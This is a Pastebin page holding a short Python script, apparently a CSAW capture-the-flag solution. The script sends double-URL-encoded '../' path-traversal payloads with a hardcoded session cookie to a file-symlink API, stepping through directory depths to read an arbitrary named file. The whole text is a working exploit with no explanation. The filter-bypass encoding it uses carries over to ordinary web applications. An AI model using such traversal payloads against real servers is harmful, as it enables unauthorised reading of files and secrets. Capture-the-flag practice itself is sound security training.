Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- name = raw_input("File name : ")
- def encode(payload):
- rep = {".":"%252E","/":"%252F"}
- cookies = {"PHPSESSID":"tmm9jc6rtdjqk8qbb020sr65c4"}
- for x in xrange(11):
- payload = ("../"*x+name).replace(".","%252E").replace("/","%252F")
- print(payload)
- print requests.post("http://web.chal.csaw.io:1001/api/v1/file/symlink", data={"path":"lol", "target":payload},cookies=cookies).text
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement